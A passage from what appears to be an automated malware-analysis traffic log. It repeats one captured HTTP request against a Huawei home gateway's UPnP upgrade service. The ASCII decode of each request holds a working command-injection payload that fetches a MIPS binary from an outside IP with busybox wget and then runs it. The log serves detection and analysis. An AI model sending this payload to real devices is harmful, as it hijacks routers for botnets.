HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 